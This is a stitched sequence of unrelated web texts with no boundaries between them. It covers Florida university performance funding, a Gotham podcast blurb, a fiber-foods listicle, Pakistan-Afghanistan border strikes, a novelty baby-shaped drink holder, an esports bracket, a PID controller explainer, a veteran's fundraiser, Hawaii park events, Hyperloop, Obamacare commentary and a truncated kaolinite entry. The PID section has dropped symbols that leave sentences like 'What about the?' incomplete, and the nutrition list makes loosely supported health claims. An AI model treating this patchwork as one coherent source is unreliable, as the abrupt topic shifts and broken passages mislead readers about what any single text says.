There are myriad ways Florida could judge the performance of its 11 state universities.
This year, the Board of Governors focused on how each of the schools prepares graduates for the workforce, divvying up an extra $20 million in "performance funding" based on scores in three criteria: graduates' employment, wages, and cost to educate.
The grading isn't without controversy, including that the data only tracks students employed in the state of Florida after graduation.
“We're 11 miles from Alabama," University of West Florida president Judy Bense told WUSF. "Thirty percent of our students are military related. That means we're educating a great number of our students who can't stay in Florida, and they're getting good degrees and it's helping their careers."
Research universities like the University of Florida will also see their costs scores penalized because they are focused on STEM programs -- science, technology, engineering, and mathematics -- that cost more to produce than other degree tracks.
Officials say they're aware of the scoring issues, and will work to refine how schools are measured in order to take each one's mission into account. In the meantime, check out which of our state universities tested best in 2013 and how much their bonus checks are worth.
Are you surprised by the results?
(S01E19) Where would you take Ms. Grace Fairchild? The Ogre's apartment is where things get wild. If a Fish can swim why does she need a ship? She doesn't. It's all just another Mooney swap trick. What do junkies land on? Not their feet. Will Catgirl teach Batman how to seem street? Will Jim take the case or live one more day? The thrill's in the hunt in this week's “Beasts of Prey”.
“Beasts of Prey” Ratings
“Under the Knife” Promo
Superheroes CAN Inspire Real People: One Fan's Amazing Story on How Laurel Lance, BLACK CANARY, Helped Her Fight and Overcome Cancer!
Rebecca's tumblr
SPOILERS: The new DC Comics Batman is…
Join our Community
Support us on Patreon
Universe Box subreddit
Contact Us:
E-mail: legendsofgotham@gmail.com
Twitter: http://twitter.com/LegendsOfGotham
Facebook: https://www.facebook.com/LegendsOfGotham
Voicemail Number: (424) 274-2352
Like this: Like Loading...
These nutritionally dense foods are packed with fiber.
You might think that slice of bread on your plate is necessary to get the fiber you need to be healthy. Think again. Bread isn't all it's cracked up to be, and there are plenty of foods that can give you all the fiber you need on a daily basis. These 10 fiber-filled all-stars including avocados, cinnamon, raspberries and eggplant have far more fiber and nutrition per calorie than wheat, and lots of other health benefits, too. Combine as many as you can in one dish, like black beans with oregano, mustard greens, avocados and barley, for one of the healthiest meals of your life.
Figs
Figs are a deliciously high-fiber fruit, containing 6.58 grams in an eight-ounce serving. You can get dried figs year-round but there's nothing quite like a juicy, fresh fig. These fruits are a great source of calcium and are also high in potassium and manganese. According to a 2008 study, there's another compelling reason to consume figs as often as possible: fiber from fruits may help prevent post-menopausal breast cancer.
Avocados
Rich and creamy, avocados can seem like a splurge. While they are dense in fat and calories, spreading a little bit on your tortilla or chopping it up for salad not only adds a lot of flavor to your meal, it also boosts your fiber intake. At 14 grams apiece, avocados contain more fiber per ounce than any other fruit. Of a single avocado's 24 grams of fat, only 4 are saturated, so they help lower “bad” LDL cholesterol and raise “good” HDL levels. They're also rich in lycopene, beta carotene, lutein, magnesium and the vitamins B, E and K.
Beans
Beans pack the biggest fiber punch of any food, with navy beans topping the charts at over 76% of your daily value per one-cup serving. Dried peas, lentils, pinto beans, black beans and lima beans are also fiber all-stars, providing over half of your daily value. Most types of beans are high in protein, folate, iron and B-vitamins, and very low in fat. Legume consumption has been associated with increased heart health.
Barley
This grain doesn't get a lot of love. Always in the shadow of its more famous counterparts wheat, oats and rye, barley is used more often as animal fodder or to make beer than it is in our daily diets. But barley is appealingly chewy and sweet, and when it comes to fiber, it's right up there with beans. A cup will provide over 54% of your daily fiber requirements. The fiber in barley is insoluble, so it provides bulk as it passes through your body, improving the health of your intestines and lowering cholesterol. It's a great source of selenium, which lowers risk of colon cancer and helps metabolize thyroid hormones.
Eggplant
This deep purple-skinned vegetable is often cooked down to such a mushy state, it's hard to believe there's much fiber in it. But in fact, eggplant has nearly three grams of fiber for every 19.7 calories. This means that unlike bread, which is high in calories for just a few grams of fiber, eggplant is an ultra-efficient means of reaching your daily requirements. Nutritionally dense, eggplant will provide you with lots of manganese, potassium, folate, B6, K and C per serving.
Raspberries
So plump and juicy, ripe raspberries are hard to resist – and you shouldn't even try. With just 63 calories, a cup of raspberries will give you over half your vitamin C and manganese, and a third of your fiber. Their low calories and nutrient density make them another high-value fiber-filled food, and all those phytonutrients with antioxidant, antimicrobial and anti-carcinogenic properties just make them taste even sweeter.
Greens
Mama says eat your greens, and you should heed her wisdom. A cup of mustard greens is one of the healthiest additions to your dinner plate, with 11.2% of your daily value of fiber, 524% of your vitamin K, 177% of vitamin A and 59% of vitamin C and just 21 calories. Collard greens have even more fiber at 5.32 grams per 49.4-calorie serving, Swiss chard boasts 3.67 grams, spinach has 4.32 and kale has 2.6. Even romaine lettuce has nearly 2 grams of fiber in a 16-calorie, 2-cup serving.
Cinnamon
Who would have thought that a spice could contain so much fiber? Sprinkling a teaspoon of cinnamon on your cereal, oatmeal or fruit will provide 5% of your daily fiber needs. Cinnamon also has anti-microbial properties and can help lessen a food's impact on your blood sugar levels by slowing the rate at which the stomach empties, which is why adding it to a sweet treat is always a good idea. It's also got lots of calcium and manganese, and research has found that it boosts brain function. Ground cloves come close to cinnamon in fiber content with nearly 3% of your daily value in a teaspoon.
Pears
Seasonal variations in different varieties of pears make them available year-round, and though they seem to be cousins of the apple, pears are actually in the rose family. There are 5.2 grams of fiber in a single, roughly 100-calorie pear. Try baking them into a pie with raspberries and cinnamon, or pair them in a salad with mustard greens and walnuts.
Herbs
Load up on the parsley, sage, rosemary and thyme, not to mention oregano, dill, coriander and fennel. Herbs are an easy way to add extra fiber to any savory meal, and oregano should be your top choice as it's got 1.53 grams in two teaspoons. Thyme and rosemary each pack over a gram, while coriander seeds have 2.12.
You might want to check out these articles as well:
Bad Fiber: Why Bread Isn't Best
15 Best Foods to Boost Your Metabolism
Can You Stomach Wheat? How Giving Up Grain Might Be Better For Your Health
Photos: 3liz4, bad, bad lechery brown, fotopedia
The Afghan government summoned Pakistan's ambassador on Saturday, hours after Islamabad reportedly launched “strikes” on militant bases in the neighbouring country's eastern provinces, increasing tension between the two sides.
Afghanistan's foreign ministry summoned ambassador Abrar Hussain in Kabul, where deputy foreign minister Hekmat Khalil Karzai sought an explanation but also conveyed his condolences for recent suicide attacks in Pakistan. In its protest, Afghanistan said at least two people were killed and two others wounded in the shelling. In response, Pakistan foreign office spokesman Nafees Zakarya told the media that Islamabad was gathering more information on this development and Pakistan's embassy in Afghanistan has been contacted.
The Pakistan Army said it had information that terrorists from across the border were behind Thursday's suicide bombing at the Lal Shahbaz Qalandar Sufi shrine in southern Sindh that killed 88 people. Hours after the bombing, Pakistani security forces have launched a nationwide operation that, they say, has left more than 100 “terrorists” dead.
The army on Friday had summoned Afghan diplomats and handed them a list of 76 militants who, they say, were supporting terror activities in Pakistan. Immediately after the attack in Sindh, Pakistan claimed the attack was planned in militant sanctuaries in Afghanistan, in remarks that could renew hostility between Kabul and Islamabad.
Geo TV channel, quoting military sources, reported that strikes were launched on the militant bases on Afghan soil on Friday night. But there has been no official word on the strikes, which, if confirmed, would be the first such operation by the Pakistan Army.
The Pakistan army reportedly targeted a training camp of Jamaat-ul-Ahrar — the banned terror group which had claimed responsibility for the February 13 suicide bombing in Lahore and another suicide attack on the headquarters of the Mohmand Agency's political administration on February 15. Some reports said several militants, including the deputy commander of Jamaat-ul-Ahrar, Adil Bacha, were killed in the strikes.
Afghanistan has also protested the closure of the border from the Pakistan side on two crossings - Torkham and Chaman border. The army also said the Pak-Afghan border has been closed since Friday night due to security reasons.
“No cross-border or unauthorised entry will be allowed into Pakistan from Afghanistan,” read an Inter-Services Public Relations (ISPR) statement issued on Friday, putting pressure on Afghanistan as trade had come to a halt.
According to the ISPR, a few hours before the attack was reported, army chief Gen Qamar Javed Bajwa had called Gen John Nicholson, commander of the US's Resolute Support Mission in Afghanistan, to protest continued acts of terrorism in Pakistan perpetrated from Afghanistan, saying they were “testing” Pakistan's policy of cross-border restraint.
Bajwa had told Nicholson that recent incidents of terrorism in Pakistan had been claimed by terrorist organisations whose leadership is hiding in Afghanistan, and asked him to play his role in “disconnecting this planning, direction, coordination and financial support”.
First Published: Feb 18, 2017 18:45 IST
Two things that Brooklynites love are public drinking and carrying around their children in pouch-like contrivances as if they're kangaroos. Combining these two loves can be a little difficult, considering no one wants to see a parent swigging out of a paper bag, but one enterprising Brooklyn entrepreneur is suggesting replacing the real baby with a fake baby made of foam rubber that functions as an insulated drink holder. It's called The Cool Baby, and it's looking to raise money on Kickstarter so the dream can become a reality.
We met up with the brains behind The Cool Baby, Williamsburg resident Simon Philion, to see if this crazy thing was real and to get a little more information on why he needs $70,000 to fund it. Answering out first question, Philion brought a Cool Baby prototype with him to show it wasn't yet another web based-hoax. Philion told us that the idea first came into his head in 2013, when he pitched it at his advertising job, when a beer company client was looking for “an iconic vessel.” After all, he told us, “The status quo is now babies strapped to our front.”
The idea was shot down before it could get to the beer company, but Philion said the idea of the baby as drink holder haunted him ever since he pitched it.
So, Philion finally went ahead with his idea after a family friend helped him get a prototype made right here in Brooklyn. The Cool Baby itself looks eerily lifelike, but that doesn't get in the way of the purpose of the product. Wearing a baby carrier, you strap the Cool Baby in after filling the insulated thermos inside with whatever liquid you want to drink. You then suck it through a mouthpiece on the top of the baby's head that's hidden in a cute cap. You can either keep the face turned towards you for maximum subterfuge or turn the face outward to let people know you're not carrying a living, breathing baby.
The appeal of the Cool Baby, beyond being a hands-free way to drink and not get caught, according to Philion, is that it's a way to “hack into baby culture…you can walk into the packs of people with strollers and the babies,” and you'll look just like one of them. Of course, instead of an actual baby in your baby carrier, you'll be ferrying a “front-mounted drink insulating carbon-based life form” according to the patent on the drink holder.
As if to prove the point that Philion was making about the Cool Baby being camouflaged enough to let you pass as just another parent, someone walking by as he removed it from it's bag muttered “Fuck, I thought that was a real baby,” and two women expressed concern for the baby left out lying on a stool, before coming over to play around with it and pose for pictures.
It's not all joy though, as Philion says that he's gotten complaints about his product trivializing parenthood and children. “Babies are a sacred thing for people, and people who quantify their self-worth through a baby hate me.” It doesn't seem to bother him, although he's sensitive to people's complaints that he's only going to be selling a white Cool Baby. The plan, according to Philion, once production ramps up is to make Cool Babies with four to five different facial dispositions and a range of races.
If the Kickstarter is fully funded, Philion plans on starting production of 5,000 Cool Babies at factories in China, before selling them directly online for $35 each. For the people who donate enough to get a Cool Baby reward, the tentative date to get one is August of this year, which still leaves time to enjoy some warm weather drinking. And since the thermos is insulated, there's no reason it can't be filled with a hot toddy or hot cider when the weather gets cooler.
Though he tells us he's treating the quest to bring The Cool Baby to the world like it's his job, Philion is laid back about the prospects of making this his new career, “Either people want this or they don't, and if the Kickstarter is successful, it's proof they do.”
Tags
Final Team League broadcast today!
VanCaspel
Four teams are still standing in the DSCL Open Team League, but after tomorrow just two will be left! Only those two teams will be invited to EpiCon to play at the finals event. Will it be 2legit2quit, AT Gaming, ECVisualize or Mouse Control? Tune in today (Wednesday) at 19:00h to find out! Check out the current brackets here.
The first match to be broadcast will be the Winner's Bracket finals between 2legit2quit and AT Gaming, followed by the Loser's semi-final between Mouse Control and ECVisualize. The winner of the second series will then play the loser of the first series for the final spot at EpiCon!
Update: teams AT Gaming and 2legit2quit advance to the finals! Broadcast was a lot of fun, subscribe to our YouTube-channel in case you missed it :).
A Conceptual Breakdown of PID Controllers
David Bittner Blocked Unblock Follow Aug 18, 2017
Introduction
There are many explanations of how a PID works, many of them fantastic. The main issue comes down to how it is explained. I tried to pick up the idea of PID equations when I was much less knowledgeable on mathematics and struggled very hard to find a tutorial that didn't explain it with notation I understood. Symbols are scary, okay?
I'm sure many of you out there are fine reading mathematical notation (and I am now too, to an limited extent) but as somebody not used to it, I found the symbols and notation to be very intimidating.
The way I want to explain PIDs here is with as little math as possible, favoring concepts over equations. They are something that are applicable to an extremely large amount of applications and I think very useful for anyone (even aside from programmers) to learn.
What is a PID Controller?
A PID Controller in essence is a method of stabilizing a system, whether that be a quadcopter, the fuel rods in a nuclear reactor, or the angle of an arm for a bio-mechanical dog harness.
A PID takes an amount of error (more on that later) and a method of reducing said error and calculates a rate to progressively solve it. For example, it is the method of taking angle data from a gyroscope and telling each rotor how fast to rotate.
The P, I, and D stand for Proportional, Derivative, and Integral gain. More on that later as well!
The Issue
You're in a car that can drive forward or backward approaching a white line. Your only instruction is to write a computer program to stop directly on that white line while also reaching it as fast as possible. All your program can do is apply a negative or positive acceleration to the car.
The simplest idea that comes to mind is the idea of, well, if you're behind the line, throttle on! If you're in front of the line throttle back!
It's pretty easy to see how that is a flawed solution. By the time you reach the line, you're going to be going too fast and shoot right past it. So, maybe your next solution is to push the throttle proportionately to how far away you are from the line. The closer you are, the less you push the gas.
Now, the issue with this is it causes the same type of phenomenon as the previous method. You oscillate, going past the line, reversing and going past it the other way. This will always reach an even oscillation (similar to a sine wave).
While this isn't our solution, this is a part of it. This is the proportional part of our PID.
The (Partial) Solution
What if you had a method of decelerating as you approached the line? A way to preemptively slow down even before you were at your goal.
This is where the D in PID comes in. Those of you who took Calculus in High School or College (don't worry if you didn't!) may know what a derivative is. Without going too deep into it, it is simply an equation that describes the rate of change of something. For example, you can see it as the car's velocity. The velocity is the rate of change of the car's position.
If we monitored how fast the car was moving, then this gives us our second tool in stopping on that line. As we approach the line, we want to be moving slower so think of the Derivative in a PID as a type of resistance. It's a value that grows larger the faster we are moving. This more easily comes into effect as we get closer as the level of proportional gain lowers. The derivative gain lowers the overall function as your error approaches zero.
This may have been a bit confusing, so lets add some numbers!
Bring the math!
Lets say we start 50 meters away from the line we are attempting to reach. Since we are 50 meters away, this means our error is equal to 50.
I know. It's hard to believe that I don't do art for a living.
Each member of a PID Controller has what is called a gain. This is simply a number multiplied to it that changes how much that member affects the equation as a whole. For example, if our gains were all one, then each member (the P the and the D) would affect the equation equally. Let us assume that currently our gains are all one for the sake of simplicity.
Let's calculate our P and D (we'll worry about the later). Our proportional gain is 50 as it is based directly off of our error. Now, we aren't moving yet so our Derivative gain is zero. It is based directly off of our change of error. Let's write this out (the K's stand for Gain don't ask why):
Slam that accelerator!
Now we're moving! Maybe a little too fast... Either way, we're attempting to accelerate the car to 50m/s now. Maybe that's a bit too harsh? This is where the gains come in. Balancing the gains of a PID is generally done manually as it only needs to be done once (unless changes to the system are made).
For those with a keen eye, you'll see that the gain for the derivative is negative. This is because we want it to resist the proportional gain. The closer we get to the point the slower we want to be going. Thus, we want the speed to negatively drag the whole acceleration value down.
You can see that as we accelerate and reduce our error, the proportional gain will go lower and the derivative gain will go higher (since we're speeding up). This even means that as we get closer to the line, if we're going too fast (as in the derivative gain is too high) it will actually pull us into negative acceleration telling our system to slow down.
Lets say the next time we do a poll for data we're now going 5m/s and our car is 40 meters away from our object. Lets see how hard we're accelerating now:
You can see that our derivative gain is keeping us from going too fast the closer we get to our objective. It may even push our equation negative causing us to slow down before we even reach our destination. This is like pressing the break as you approach the line at a red light.
What about the?
Now, I've saved the Integral element until last because it is generally the least important and most difficult to see it's worth. A lot of systems don't even include it!
The stands for Integral gain. An Integral is known as a summation over a period of time. Essentially, if you have an equation that maps the velocity of an object the integral of that equation will map the position of the object. This is because it records the sum of the velocity at each moment resulting in the distance the object has moved.
How does this help the PID, you may ask. Well, now that we have Proportional and Derivative gain, you may ask what happens if we overshoot slightly? The issue with this is it is now very slow to correct that slight error (and there is likely to be some). As the proportional gain tries to accrue a slight velocity, the derivative is now resisting this.
If we sum up the total error, then this will drag us back into the Goldilocks zone of zero error resolving the issue of slow acceleration at points very close to zero error.
EDIT: As some great people on Reddit pointed out I left out the most important use of the integral term. The integral term is used to eliminate systematic error.
For example, let's say there is some small amount of resistance on the turn (there always is in real world applications) or perhaps your quadcopter had some weight added to it.
The integral term due to its level of accumulation, is able to drag it back on track.
Calculating Gains
Without gains the system will not react properly. It may oscillate, or the derivative and proportional elements may cancel each other out. Balancing them is what brings the system to equilibrium.
Unfortunately there is no method of directly calculating what gains you want to use. There are ways to dynamically find good values based on how the system is reacting, but there are many papers on how to do that and I find that a very difficult concept to explain non-mathematically.
Luckily, there are good methods of doing it manually and unless any changes are made to the system you won't have to do it more than once.
The method I have found most useful is to adjust the proportional gain until you have steady oscillation and have found a desirable speed in which you reach zero error.
From there you want to adjust the derivative gain until oscillations stop. If the system is now too slow, repeat the cycle.
Addendum
Ever since I learned PIDs I have always been fascinated by them. They're very cool in the sense that they almost have intelligence. As long as you can find a source of error and a way to reduce it, a PID can solve the issue.
Want to keep a ball from rolling off a platform by varying the tilt of the platform? Use a PID! Want to calculate how much to tilt a quadcopter to stop it from moving laterally? A PID is perfect for that.
It's very interesting and a very widely applicable concept.
If you made it this far, thank you so much for reading. This is a concept I've always loved sharing with people purely due to the fact I find it easy to explain. If you found something confusing, please shoot me a message, comment, or tweet at me @bittneradave and I will try and answer your question/revise this post as well as I can!
Hello, my name is Megan and I am the wife of a wounded warrior. Derek is an infantry Marine who served 4 years in the Corps. In these four years he deployed to Iraq twice and volunteered for a third tour to Afghanistan. During these tours he was hit by 3 IEDs and suffered injuries to his back and head. Though most of his wounds are not visible they affect his day-to-day life greatly. Derek had emergency back surgery in 2012 due to an injury he sustained in Iraq, he is healing, but it leaves him unable to do many of the things he greatly enjoys like working with his hands in construction and even lifting and playing with our children. He has been diagnosed with PTSD & TBI. These diagnosis's make even the easiest of tasks difficult for Derek. Due to the PTSD he lives with a heightened awareness which makes things as trivial as going grocery shopping difficult. High levels of anxiety make any activity around groups of people tough. Derek is ineligible for employment and depends totally on his VA compensation to support his family. We are raising money to help fund a service dog to ease the obstacles he faces each day. The cost of a dog can range in $20,000+ and as of now we are unable to afford anything in this range. Thank you for helping a Veteran, Semper Fi.
Help spread the word! Share Tweet 322 total shares
Hawai‘i Volcanoes National Park invites the public to enjoy free guided hikes, “Coffee Talks” and Hawaiian cultural programs in its Kahuku Unit from October through December 2017. Visitors are welcome to explore Kahuku on their own on Fridays, Saturdays and Sundays, from 9 a.m. to 3 p.m.
For the upcoming holidays, the Kahuku Unit will be open for visitors on both Christmas Eve, Dec. 24, and New Year's Eve, Dec. 31. No guided programs will be offered on these days.
The Kahuku Unit of Hawai‘i Volcanoes National Park is accessible through the mauka (inland) side of Highway 11 near mile marker 70.5. Hiking participants should meet near the parking area and are advised to bring sturdy footwear, water, raingear, sun protection and a snack. Entrance fees and all programs are free.
Keep up with Kahuku events by visiting the park calendar.
Calendar of Activities:
Participate in ‘Ike Hana No‘eau (Experience the Skillful Work) Hawaiian cultural demonstrations at Kahuku on the third Friday of each month from 10 a.m. to noon, Oct. 20, Nov. 17, and Dec. 15. All programs are free.
Get to know both your park and your neighbors during an informal “Coffee Talk” conversation spanning a wide variety of topics at Kahuku on the last Friday of most months (there is no Coffee Talk in November). Ka‘ū coffee, tea and pastries will be available for purchase. Coffee Talks will be offered free on Oct. 27 and Dec. 29, from 9:30 a.m. to 11 a.m.
Guided Hikes:
I went to Las Vegas recently to view the first test of Hyperloop. As someone who experiences aging infrastructure daily and desires something better, I was ready to be convinced of the feasibility and future of this idea, which has become one of the purest expressions of techno-optimism.
First, a little background. In 2013, Elon Musk, he of Tesla and space exploration fame, floated a 58-page outline presenting Hyperloop as an alternative to California's high-speed rail (though in fact the idea has existed since the 1800s — Google it). A smart but busy man, Mr. Musk announced that he wanted to make Hyperloop a sort of open-source Manhattan Project for high-speed transportation, since he didn't have the time to pursue it himself.
Several separate entities have since been formed to explore the possibilities. The event I attended was presented by Hyperloop Technologies, a group inspired by but not affiliated with Mr. Musk (though riding on his name recognition and involving several of his former employees). Hyperloop Technologies and its competitors are working to develop a structure to move passengers and cargo between two points safely, efficiently and sustainably. And quickly: Mr. Musk's initial dream was to propel passengers from San Francisco to Los Angeles in about a half an hour (Amtrak takes 12 hours; flight time is an hour).
Hyperloop Technologies, which announced its name change to Hyperloop One with much fanfare in Las Vegas, is a well-funded operation with over 100 employees. It's gaining new investors (such as Vinod Khosla, a founder of Sun Microsystems; Sherpa Ventures; and SNCF, the French train company) and new partners (including the engineering firms Aecom and ARUP, as well as the starchitect Bjarke Ingels) almost as fast as the model on view at its press event.
Approximately 200 investors, polo-shirted employees and reporters piled onto buses to converge on a site that looked eerily like a desert scene from “Breaking Bad.” We'd been brought here to watch a test vehicle accelerate down a rail track at speeds of up to 300 m.p.h. using the company's propulsion technology. The dream is that capsules will hurl through a tube at 700 miles per hour on a cushion of air. That, however, was not what we witnessed.
Robert Laszewski is president of Health Policy and Strategy Associates, a policy and marketplace consulting firm where he works closely with many in the heath industry as they try to navigate the Affordable Care Act. He's also the author of the excellent Health Care Policy and Marketplace Review blog, as well as Wonkblog's 2013 "Pundit of the Year". We spoke on Wednesday. A lightly edited transcript of our conversation follows.
(Photo by Mark Wilson/Getty Images)
Ezra Klein: Give me your status report on Obamacare. Where do you think the law stands now?
Robert Laszewski: They're about where I expected them to be. HealthCare.Gov on the front-end is in pretty good shape. It's where it should've been at launch. The back-end is still highly problematic. Clearly the administration put its emphasis on the consumer side. Insurers are still seeing errors in probably 5 percent of the files coming through. That's compounded by the issue of all the people enrolling in the last few weeks. That's a huge surge that would create customer-service problems in the best of circumstances, So I think it'll take until about the end of January till everyone is straightened out and where they should be.
EK: You mentioned the continued problems with error-ridden files. What are insurers doing for these people?
RL: There are two things. There are some obvious errors you get and the insurer can go back to the customer and straighten them out. That's a very laborious task. The other thing that the administration is doing is a manual reconciliation. There's unfortunately no computerized check between whom HealthCare.Gov thinks is enrolled and who the insurance industry's computer systems think is enrolled. So it's being done manually. That's a big problem.
The other challenge now is getting people to pay for coverage. I was surprised today calling around to people to find only about 50 percent have paid. That's not a reason to panic yet. The due dates for payment have been sliding all around, so people can be confused. But it can be a mess. Some insurers are doing autocalls like politicians do the night before the election asking people to pay.
EK: I recognize that we won't really know what the mix of healthy and sick people is until at least April, once we see the surge from the individual mandate. But what are insurers seeing in the mix so far?
RL: It's not positive. I don't want to say people have given up on the notion they'll get a good mix. They know the administration will make a big push. The insurance companies will spend big on advertising and outreach. So no one has given up. But it doesn't look good right now.
There's a big misconception that this is about young people. That's baloney. It's about healthy people. A healthy 20-year-old might only pay a $100 premium. You want healthy 40 and 50-year-olds. The big problem right now is really total enrollment. We only have about 10 percent of the uninsured in here. Insurers think you need more like 70 percent of a pool of people to sign up.
EK: When you say “a pool,” what do you mean by that here?
RL: The people who are uninsured and eligible for the exchanges and the people coming over from the individual market. That's the new pool. It's hard to estimate exactly how many of them there are. But I think we're going to ultimately need about 20 million people for a sustainable pool. It doesn't need to be this year. That's what the transitional risk corridors are all about. But it needs to happen in the first few years. So when I hear people talk about the goal being seven million, I think, “time out.” This needs to be 20 million people within three years.
The problem with the enrollments today is that they're so small, it's less than 10 percent of the uninsured coming in, it really can't be anything but sick people. So if it's going to be sustainable you need loads of people coming in the door. So when I judge where Obamacare is on December 31st or March 31st, I want to have confidence that this thing is ramping up to 20 million. I want to see momentum.
EK: That brings up two issues. The first is the individual mandate, which begins this year but is a much bigger penalty in year two, and then even bigger in year three. So one question here is how well that works.
RL: I have an interesting answer for that. I think the mandate is almost worthless because the word is getting around that they can't really collect it. And by year three, it's really a lot of money. I think there'll be real pressure to just get rid of it. I don't think you can force people to buy this insurance. If they don't want it there'll be a political groundswell to get rid of it. So in my mind the individual mandate is kind of irrelevant to this.
EK: There seems to be a bit of a contradiction there. You're saying the mandate wont scare people because it can't be collected, but that the penalty is so large that they'll hate it enough to get rid of it. It seems to me that if people really think the penalty is huge, then the mandate is likely to do its work and persuade people to buy insurance.
RL: I think it's all about whether they have confidence in Obamacare or not. The mandate will be effective for free riders. No one has a problem penalizing people who don't pay their fair share. But if Obamacare hasn't been sold to the American people as something they should want then the mandate will just be rubbing salt in the wound and there'll be enormous political pressure to get rid of it. So I think this gets back to whether the American people end up accepting obamacare or not.
EK: The other issue here are premiums in the exchanges in 2015. You've argued that you don't think they'll go up very much, even if not that many healthy people sign up. Why?
RL: I think the 2015 rates will be the rates you're looking at today, more or less. Everyone believes this is an absolutely catastrophic launch. But the “three Rs” buy the administration and the insurers another year to try and reboot the thing. Insurers don't want to just end up with a bad mix.
Having said that I do have a concern that people are looking at these plans and not finding value. Some people are looking at paying 10 percent of their income for plans with huge deductibles, and then you have politics of Obamacare and the bad press of the launch and if you put all those things in a bag and mix them up, I am really concerned that the uninsured who are healthy are not finding Obamacare the value they hoped it will be. That's the real risk for Obamacare.
EK: Do you think there's anything the Obama administration can do about that? Or is it just a question of the marketplace at work now?
RL: I don't think there's anything they can do for March 31. But as we move to 2015 open enrollment, the Secretary of Health and Human Services has some power to reshape the plans. The mandated benefits are so high they've driven costs up and created narrower networks. The statute talks about actuarial levels so the Secretary can't just do anything she wants. But given a combination of regulatory authority and what the Obama administration has been willing to do already in overriding statute, I think they could do some pretty significant things.
If an entrepreneur had crafted Obamacare he would've gone to a middle class family. A family of four make $54,000 a year has to pay $400 in premiums net of subsidy and for that the standard silver plan has an average deductible around $2,500 and a narrow network. They're going to pay almost $5,000 for that?
So the entrepreneur would say I've got $5,000 in premium and all this deductible, what do they want for that? And they probably would've said we want office visits and lab tests because the kids need to go in occasionally and then we want catastrophic care. The problem with Obamacare is it's product driven and not market driven. They didn't ask the customer what they wanted. And I think that's the fundamental problem with Obamacare. It meets the needs of very poor people because you're giving them health insurance for free. But it doesn't really meet the needs of healthy people and middle-class people.
William Horbury Cambridge University Press , Sep 18, 2014 - Religion 0 Reviews Two major Jewish risings against Rome took place in the years following the destruction of Jerusalem - the first during Trajan's Parthian war, and the second, led by Bar Kokhba, under Hadrian's principate. The impact of these risings not only on Judaea, but also on Cyrene, Egypt, Cyprus and Mesopotamia, is shown by accounts in both ancient Jewish and non-Jewish literature. More recently discovered sources include letters and documents from fighters and refugees, and inscriptions attesting war and restoration. Historical evaluation has veered between regret for a pointless bloodbath and admiration for sustained resistance. William Horbury offers a new history of these risings, presenting a fresh review of sources and interpretations. He explores the period of Jewish war under Trajan and Hadrian not just as the end of an era, but also as a time of continuity in Jewish life and development in Jewish and Christian origins. Preview this book »
IT HAS been more than six years since the Affordable Care Act passed and nearly three years since its major provisions began phasing in. During that time, the rate of uninsured Americans has plummeted to a historic low. Also during that time, Republicans have blamed the law for practically every problem with the health-care system, the economy and more. But they have infamously not united behind a credible alternative.
House Speaker Paul D. Ryan (R-Wis.) seemed to promise better when he announced that he would roll out an ambitious policy agenda this summer. Instead, last week he released an Obamacare alternative that is less detailed in a variety of crucial ways than previous conservative health reform proposals. The outlines that the speaker did provide suggest that it would be hard on the poor, old and sick.
Mr. Ryan's plan would replace Obamacare with a tax credit available to people buying insurance plans in markets regulated by the states, not the federal government. The proposal does not say how valuable the credit would be, nor the rate at which it would increase. The document also does not predict how many people it would cover, nor how much the plan would cost. The latter is a major question in part because the plan would waste money offering tax credits to everyone, regardless of income. Republican staffers argue that the proposal is just a starting point for discussion. Yet other Obamacare-replacement proposals have included such numbers. The fact that Mr. Ryan's does not render the plan difficult to evaluate or take seriously. This many years on, the GOP has no excuse for blank spaces.
The proposal hints that the credit would be sufficient to cover the cost of plans that existed before the ACA. This is not reassuring: Pre-ACA, individual-market insurance plans were often thin, with limited benefits, extensive cost-sharing and other elements designed to deter anyone who might actually need care. Without strong coverage requirements, insurers would have limited incentive to offer plans that appealed to people who may be — or may become — sick. States would be hampered in responding to these issues: The proposal would allow insurers to sell plans across state lines, so the state with the skimpiest regulations would likely set the national standard.
People with money to put into health savings accounts (which the proposal would expand), could cover gaps in thin insurance coverage with tax-advantaged out-of-pocket spending — but this would not be a realistic option for low-income people. As for the old, the plan would scale up the tax credits with age, but it would also permit insurers to raise premiums with age much more than the ACA currently allows. The proposal gives no sense that the two will come close to matching up; as in other conservative plans, those in late middle age could face much higher costs. For the sick, meanwhile, Mr. Ryan's plan would offer an ultimate backstop by funding high-risk insurance pools. But health-care experts caution that this approach would cost a massive amount of federal money — a fact that has caused Republican lawmakers to balk at policies like it when fleshed out.
GOP leadership in the House of Representatives are introducing a plan to replace the Affordable Care Act. Here's what the proposal wants to change. (Jenny Starrs/The Washington Post)
At least, Republicans might argue, Mr. Ryan's proposal would eliminate the hated individual mandate requiring people to buy insurance. Yet it would replace it with an even more coercive system. Protections for those with preexisting conditions would only apply for those who kept continuous health-care coverage. Under the current system, if you fail to obtain health insurance in a year, you might have to pay a penalty of few hundred dollars. Under Mr. Ryan's plan, the Urban Institute's Linda Blumberg explains, “If you slip through the cracks, your penalty is you may never be able to get health-insurance coverage again.”
"Kaolin" redirects here. For the community in the United States, see Kaolin, Pennsylvania
Kaolinite ()[4][5] is a clay mineral, part of the group of industrial minerals, with the chemical composition Al 2 Si 2 O 5 (OH) 4 . It is a layered silicate mineral, with one tetrahedral sheet of silica (SiO 4 ) linked through oxygen atoms to one octahedral sheet of alumina (AlO 6 ) octahedra.[6] Rocks that are rich in kaolinite are known as kaolin or china clay.[7]
The name "kaolin" is derived from "Gaoling" (Chinese: 高嶺; pinyin: Gāolǐng; literally: 'High Ridge"), a Chinese village near Jingdezhen in southeastern China's Jiangxi Province.[8] The name entered English in 1727 from the French version of the word: kaolin, following François Xavier d'Entrecolles's reports on the making of Jingdezhen porcelain.[9]
Kaolinite has a low shrink–swell capacity and a low cation-exchange capacity (1–15 meq/100 g). It is a soft, earthy, usually white, mineral (dioctahedral phyllosilicate clay), produced by the chemical weathering of aluminium silicate minerals like feldspar. In many parts of the world it is colored pink-orange-red by iron oxide, giving it a distinct rust hue. Lighter concentrations yield white, yellow, or light orange colors. Alternating layers are sometimes found, as at Providence Canyon State Park in Georgia, United States. Commercial grades of kaolin are supplied and transported as dry powder, semi-dry noodle or as liquid slurry.
Chemistry [ edit ]
Notation [ edit ]
The chemical formula for kaolinite as used in mineralogy is Al 2 Si 2 O 5 (OH) 4 ,[3] however, in ceramics applications the formula is typically written in terms of oxides, thus the formula for kaolinite is Al 2 O 3 ·2SiO 2 ·2H 2 O.[10]
Beevers crystal structure model of Kaolinite, showing the interlayer hydrogen bonds
|thumb|Kaolinite structure, showing the interlayer hydrogen bonds[11]]]]
Structural transformations [ edit ]
